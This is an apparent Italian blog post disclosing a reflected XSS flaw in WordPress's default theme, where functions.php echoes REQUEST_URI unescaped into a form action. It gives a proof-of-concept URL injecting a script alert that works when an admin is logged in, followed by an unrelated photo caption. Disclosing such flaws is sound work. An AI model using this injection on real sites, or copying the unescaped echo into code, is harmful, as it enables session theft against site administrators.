In rete circolano tanti temi per wordpress, molto diversi tra loro ma accomunati comunque da codice possibilmente vulnerabile. A quanto pare sembra sia stata scoperta scoperta una falla XSS nel tema di default di Wordpres.
C’è da dire che funziona solo con l’admin loggato:
.
.
Nome del file functions.php
PHP
-
<p id=“jsForm”> </p>
-
-
<form style=“display: inline” method=“post” name=“hicolor” id=“hicolor” action=“<?php echo $_SERVER[’REQUEST_URI’]; ?>”>
-
</form>
$_SERVER[’REQUEST_URI’] echoed all’utente direttamente.
Un exploit è il seguente:
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx”><script>alert(123)</script>
![ngnr Frank (Francesco De Rosa) posted a photo: 21 Giugno 2008 - Solstizio d'EstateSan Leonardo di Siponto (FG) [?]Fenomeno del raggio di luce a San Leonardo di Siponto (FG): dal Foro Gnomonico praticato nella volta dell'Abbazia il sole confluisce in un determinato punto al mezzogiorno astronomico del Solstizio d'Estate disegnando sul pavimento un rosone.www.sanleonardodisiponto.it/Canon EOS 20D con Tokina 12-24mm f/4](http://farm4.staticflickr.com/3093/2600253028_c6845452ee_s.jpg "ngnr Frank (Francesco De Rosa) posted a photo: 21 Giugno 2008 - Solstizio d'EstateSan Leonardo di Siponto (FG) [?]Fenomeno del raggio di luce a San Leonardo di Siponto (FG): dal Foro Gnomonico praticato nella volta dell'Abbazia il sole confluisce in un determinato punto al mezzogiorno astronomico del Solstizio d'Estate disegnando sul pavimento un rosone.www.sanleonardodisiponto.it/Canon EOS 20D con Tokina 12-24mm f/4")
No Comments su “XSS nel Default Theme di Wordpress”